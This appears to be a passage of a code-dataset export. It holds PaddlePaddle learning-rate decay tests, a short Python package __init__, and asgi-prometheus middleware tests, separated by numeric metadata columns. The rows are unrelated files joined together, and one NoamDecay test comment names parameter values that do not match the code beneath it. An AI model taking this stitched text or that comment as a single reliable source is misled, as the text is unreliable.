input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
power=1.0,
begin=2,
step=2,
cycle=True),
parameter_list=fc.parameters())
for step in range(20):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(20):
lr = math.ceil((i * 2 + 2) / 7)
if lr == 0:
lr = 1
tmp = 7 * lr
tmp = (2 - 0.5) * (1 - (i * 2 + 2) / tmp)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
def test_NoamDecay():
"""
test NoamDecay Noam学习率衰减
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
d_model = 2
warmup_steps = 2
begin = 1
step = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NoamDecay(
d_model=d_model,
warmup_steps=warmup_steps,
begin=begin,
step=step),
parameter_list=fc.parameters())
for i in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
lr = np.power(d_model, -0.5) * np.min([
np.power((i * step + begin), -0.5),
np.power(warmup_steps, -1.5) * (i * step + begin)
])
exp.append(lr)
tools.compare(res, exp)
# d_model = 5
d_model = 5
warmup_steps = 2
begin = 1
step = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NoamDecay(
d_model=d_model,
warmup_steps=warmup_steps,
begin=begin,
step=step),
parameter_list=fc.parameters())
for i in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
lr = np.power(d_model, -0.5) * np.min([
np.power((i * step + begin), -0.5),
np.power(warmup_steps, -1.5) * (i * step + begin)
])
exp.append(lr)
tools.compare(res, exp)
# d_model = 5 warmup_steps = 1
d_model = 5
warmup_steps = 1
begin = 1
step = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NoamDecay(
d_model=d_model,
warmup_steps=warmup_steps,
begin=begin,
step=step),
parameter_list=fc.parameters())
for i in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
lr = np.power(d_model, -0.5) * np.min([
np.power((i * step + begin), -0.5),
np.power(warmup_steps, -1.5) * (i * step + begin)
])
exp.append(lr)
tools.compare(res, exp)
# d_model = 5 warmup_steps = 5
d_model = 5
warmup_steps = 5
begin = 3
step = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NoamDecay(
d_model=d_model,
warmup_steps=warmup_steps,
begin=begin,
step=step),
parameter_list=fc.parameters())
for i in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
lr = np.power(d_model, -0.5) * np.min([
np.power((i * step + begin), -0.5),
np.power(warmup_steps, -1.5) * (i * step + begin)
])
exp.append(lr)
tools.compare(res, exp)
# d_model = 5 warmup_steps = 5 begin = 3 step = 2
d_model = 5
warmup_steps = 5
begin = 1
step = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NoamDecay(
d_model=d_model,
warmup_steps=warmup_steps,
begin=begin,
step=step),
parameter_list=fc.parameters())
for i in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
lr = np.power(d_model, -0.5) * np.min([
np.power((i * step + begin), -0.5),
np.power(warmup_steps, -1.5) * (i * step + begin)
])
exp.append(lr)
tools.compare(res, exp)
| 37.121714
| 103
| 0.531896
| 4,654
| 38,124
| 4.220885
| 0.044908
| 0.071472
| 0.009367
| 0.013134
| 0.935247
| 0.932855
| 0.922317
| 0.919925
| 0.91967
| 0.915699
| 0
| 0.054221
| 0.347891
| 38,124
| 1,026
| 104
| 37.157895
| 0.735932
| 0.051175
| 0
| 0.923777
| 0
| 0
| 0.009538
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007964
| false
| 0
| 0.004551
| 0
| 0.012514
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
357f5b0a935d4a8d19fcf832d6a3cca351e58e39
| 96
|
py
|
Python
|
src/ur_fabrication_control/direct_control/mixins/__init__.py
|
augmentedfabricationlab/ur_fabrication_control
|
e2af04e3ad7bba0ad5131844e4ccab2e2a4a1663
|
[
"MIT"
] | 5
|
2021-08-12T07:20:02.000Z
|
2022-02-26T02:48:32.000Z
|
src/ur_fabrication_control/direct_control/mixins/__init__.py
|
augmentedfabricationlab/ur_fabrication_control
|
e2af04e3ad7bba0ad5131844e4ccab2e2a4a1663
|
[
"MIT"
] | 7
|
2021-01-20T16:31:21.000Z
|
2021-01-21T15:36:45.000Z
|
src/ur_fabrication_control/direct_control/mixins/__init__.py
|
augmentedfabricationlab/ur_fabrication_control
|
e2af04e3ad7bba0ad5131844e4ccab2e2a4a1663
|
[
"MIT"
] | 2
|
2020-11-19T14:26:41.000Z
|
2020-12-11T13:32:55.000Z
|
from .airpick_mixins import *
from .areagrip_mixins import *
from .parallelgrip_mixins import *
| 24
| 34
| 0.8125
| 12
| 96
| 6.25
| 0.5
| 0.48
| 0.426667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 96
| 3
| 35
| 32
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
358b65f8d4f33382ed4f39353971ee6aa0e4b20e
| 2,541
|
py
|
Python
|
tests.py
|
klen/asgi-prometheus
|
c5ed505fd2a6e8f35a2f5d5f146715858e417385
|
[
"MIT"
] | 4
|
2021-04-09T20:18:41.000Z
|
2021-05-01T19:43:53.000Z
|
tests.py
|
klen/asgi-prometheus
|
c5ed505fd2a6e8f35a2f5d5f146715858e417385
|
[
"MIT"
] | 1
|
2021-04-09T18:01:32.000Z
|
2021-04-12T07:59:10.000Z
|
tests.py
|
klen/asgi-prometheus
|
c5ed505fd2a6e8f35a2f5d5f146715858e417385
|
[
"MIT"
] | null | null | null |
from asgi_tools.tests import ASGITestClient
from asgi_tools.app import App
async def test_base():
from asgi_prometheus import PrometheusMiddleware
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b"OK", "more_body": False})
app = PrometheusMiddleware(app, metrics_url='/metrics')
client = ASGITestClient(app)
res = await client.get('/')
assert res.status_code == 200
assert await res.text() == 'OK'
res = await client.get('/metrics')
assert res.status_code == 200
text = await res.text()
assert text
assert 'requests_count_total' in text
assert 'requests_time' in text
async def test_group_path():
from asgi_prometheus import PrometheusMiddleware
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b"OK", "more_body": False})
app = PrometheusMiddleware(app, group_paths={'/api', '/api/v1/users'})
client = ASGITestClient(app)
res = await client.get('/')
assert res.status_code == 200
assert await res.text() == 'OK'
res = await client.get('/api/v1/users')
assert res.status_code == 200
res = await client.get('/api/v1/messages')
assert res.status_code == 200
res = await client.get('/unknown')
assert res.status_code == 200
res = await client.get('/prometheus')
assert res.status_code == 200
text = await res.text()
assert 'requests_count_total{method="GET",path="/api*"}' in text
assert 'requests_count_total{method="GET",path="/api/v1/users*"}' in text
async def test_asgi_tools_internal():
from asgi_prometheus import PrometheusMiddleware
app = App()
app.middleware(PrometheusMiddleware)
client = ASGITestClient(app)
res = await client.get('/')
assert res.status_code == 404
res = await client.get('/prometheus')
assert res.status_code == 200
text = await res.text()
assert text
assert 'requests_count_total' in text
async def test_asgi_tools_external():
from asgi_prometheus import PrometheusMiddleware
app = App()
app = PrometheusMiddleware(app)
client = ASGITestClient(app)
res = await client.get('/')
assert res.status_code == 404
res = await client.get('/prometheus')
assert res.status_code == 200
text = await res.text()
assert text
assert 'requests_count_total' in text
| 28.550562
| 85
| 0.670209
| 329
| 2,541
| 5.051672
| 0.164134
| 0.052948
| 0.092659
| 0.112515
| 0.848977
| 0.838147
| 0.83213
| 0.803249
| 0.739471
| 0.632371
| 0
| 0.021214
| 0.202283
| 2,541
| 88
| 86
| 28.875
| 0.798717
| 0
| 0
| 0.730159
| 0
| 0
| 0.164896
| 0.040535
| 0
| 0
| 0
| 0
| 0.349206
| 1
| 0
| false
| 0
| 0.095238
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.